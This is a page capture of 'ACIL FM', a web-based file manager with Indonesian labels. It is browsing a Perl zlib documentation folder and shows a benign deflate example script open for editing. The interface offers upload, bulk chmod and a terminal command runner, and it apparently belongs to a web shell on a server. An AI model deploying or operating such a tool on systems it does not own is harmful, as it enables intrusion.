ACIL FM
Dark
Refresh
Current DIR:
/usr/share/doc/perl-IO-Compress/compress-zlib
/
usr
share
doc
perl-IO-Compress
compress-zlib
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
filtdef
437 B
chmod
View
DL
Edit
Rename
Delete
filtinf
468 B
chmod
View
DL
Edit
Rename
Delete
gzcat
489 B
chmod
View
DL
Edit
Rename
Delete
gzgrep
457 B
chmod
View
DL
Edit
Rename
Delete
gzstream
313 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /usr/share/doc/perl-IO-Compress/compress-zlib/filtdef
#!/usr/bin/perl use strict ; use warnings ; use Compress::Zlib ; binmode STDIN; binmode STDOUT; my $x = deflateInit() or die "Cannot create a deflation stream\n" ; my ($output, $status) ; while (<>) { ($output, $status) = $x->deflate($_) ; $status == Z_OK or die "deflation failed\n" ; print $output ; } ($output, $status) = $x->flush() ; $status == Z_OK or die "deflation failed\n" ; print $output ;
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply